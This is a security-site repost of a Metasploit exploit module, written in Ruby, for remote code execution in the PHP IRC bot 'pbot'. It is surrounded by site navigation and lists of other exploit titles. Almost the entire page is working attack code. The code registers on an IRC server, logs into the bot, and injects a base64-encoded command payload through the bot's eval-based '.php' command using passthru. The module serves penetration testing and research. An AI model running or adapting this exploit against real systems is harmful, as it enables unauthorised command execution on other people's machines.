首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 PHP IRC Bot pbot eval() Remote Code Execution 来源：http://www.metasploit.com 作者：evilcry 发布时间：2012-08-09   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. #   http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote     Rank = ExcellentRanking     include Msf::Exploit::Remote::Tcp     def initialize(info = {})         super(update_info(info,             'Name'           => 'PHP IRC Bot pbot eval() Remote Code Execution',             'Description'    => %q{                     This module allows remote command execution on the PHP IRC bot pbot by abusing                 the usage of eval() in the implementation of the .php command. In order to work,                 the data to connect to the IRC server and channel where find pbot must be provided.                 The module has been successfully tested on the version of pbot analyzed by Jay                 Turla, and published on Infosec Institute, running over Ubuntu 10.04 and Windows XP                 SP3.                 },             'Author'         =>                 [                     'evilcry', # pbot analysis'                     'Jay Turla', # pbot analysis                     '@bwallHatesTwits', # PoC                     'juan vazquez' # Metasploit module                 ],             'License'        => MSF_LICENSE,             'References'     =>                 [                     [ 'EDB', '20168' ],                     [ 'URL', 'http://offensivecomputing.net/?q=node/1417'],                     [ 'URL', 'http://resources.infosecinstitute.com/pbot-analysis/']                 ],             'Platform'       => [ 'unix', 'win'],             'Arch'           => ARCH_CMD,             'Payload'        =>                 {                     'Space'    => 344, # According to RFC 2812, the max length message is 512, including the cr-lf                     'BadChars' => '',                     'DisableNops' => true,                     'Compat'      =>                         {                             'PayloadType' => 'cmd',                         }                 },             'Targets'  =>                 [                     [ 'pbot', { } ]                 ],             'Privileged'     => false,             'DisclosureDate' => 'Nov 02 2009',             'DefaultTarget'  => 0))         register_options(             [                 Opt::RPORT(6667),                 OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),                 OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),                 OptString.new('CHANNEL', [true, 'IRC Channel', '#channel']),                 OptString.new('PBOT_PASSWORD', [false, 'pbot Password', ''])             ], self.class)     end     def check         connect         response = register(sock)         if response =~ /463/ or response =~ /464/             print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")             return Exploit::CheckCode::Unknown         end         response = join(sock)         if not response =~ /353/ and not response =~ /366/             print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")             return Exploit::CheckCode::Unknown         end         response = pbot_login(sock)         quit(sock)         disconnect         if response =~ /auth/ and response =~ /logged in/             return Exploit::CheckCode::Vulnerable         else             return Exploit::CheckCode::Safe         end     end     def send_msg(sock, data)         sock.put(data)         data = ""         begin             read_data = sock.get_once(-1, 1)             while not read_data.nil?                 data << read_data                 read_data = sock.get_once(-1, 1)             end         rescue EOFError         end         data     end     def register(sock)         msg = ""         if datastore['IRC_PASSWORD'] and not datastore['IRC_PASSWORD'].empty?             msg << "PASS #{datastore['IRC_PASSWORD']}\r\n"         end         if datastore['NICK'].length > 9             nick = rand_text_alpha(9)             print_error("The nick is longer than 9 characters, using #{nick}")         else             nick = datastore['NICK']         end         msg << "NICK #{nick}\r\n"         msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"         response = send_msg(sock,msg)         return response     end     def join(sock)         join_msg = "JOIN #{datastore['CHANNEL']}\r\n"         response = send_msg(sock, join_msg)         return response     end     def pbot_login(sock)         login_msg = "PRIVMSG #{datastore['CHANNEL']} :.login"         if datastore['PBOT_PASSWORD'] and not datastore['PBOT_PASSWORD'].empty?             login_msg << " #{datastore['PBOT_PASSWORD']}"         end         login_msg << "\r\n"         response = send_msg(sock, login_msg)         return response     end     def pbot_command(sock)         encoded = Rex::Text.encode_base64(payload.encoded)         command_msg = "PRIVMSG #{datastore['CHANNEL']} :.php #{rand_text_alpha(1)} passthru(base64_decode(\"#{encoded}\"));\r\n"         response = send_msg(sock, command_msg)         return response     end     def quit(sock)         quit_msg = "QUIT :bye bye\r\n"         sock.put(quit_msg)     end     def exploit         connect         print_status("#{rhost}:#{rport} - Registering with the IRC Server...")         response = register(sock)         if response =~ /463/ or response =~ /464/             print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")             return         end         print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")         response = join(sock)         if not response =~ /353/ and not response =~ /366/             print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")             return         end         print_status("#{rhost}:#{rport} - Registering with the pbot...")         response = pbot_login(sock)         if not response =~ /auth/ or not response =~ /logged in/             print_error("#{rhost}:#{rport} - Error registering with the pbot")             return         end         print_status("#{rhost}:#{rport} - Exploiting the pbot...")         pbot_command(sock)         quit(sock)         disconnect     end end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Plixer Scrutinizer NetFlow and ·Easewe FTP (EaseWeFtp.ocx) Ins ·IBM Proventia Network Mail Sec ·Oracle Business Transaction Ma ·Oracle Business Transaction Ma ·Ubisoft uplay 2.0.3 Active X C ·NetDecision 4.2 TFTP Writable ·Oracle AutoVue ActiveX Control ·Solaris 10 Patch Cluster Symli ·CoolPlayer+ Portable 2.19.2 Bu ·Tunnelblick Local Root Exploit ·AOL Products downloadUpdater2   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved